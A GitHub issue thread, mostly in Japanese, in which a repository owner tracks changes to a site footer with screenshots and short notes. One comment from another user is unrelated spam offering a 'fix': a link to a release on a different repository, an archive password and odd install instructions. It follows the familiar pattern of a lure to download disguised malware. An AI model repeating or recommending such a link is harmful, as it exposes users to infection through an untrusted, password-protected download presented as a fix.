### ISSUE TITLE
フッターを変更する

### ISSUE THREAD

**Issue by masato1224** [masato1224/my-scrap-note#11]
![image](https://github.com/user-attachments/assets/d806847e-1020-4d9a-b9fb-bc7a91f87ff4)

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masato1224** [comment]
## 削除

![image](https://github.com/user-attachments/assets/e0880421-6733-43ee-8ce2-96732d958a03)

**Comment by masato1224** [comment]
## 修正

+ リンク変更
  + ![image](https://github.com/user-attachments/assets/2fbcda9a-0e6a-4f15-86f9-c1a1b5157158)
+ 追加
  + Resume
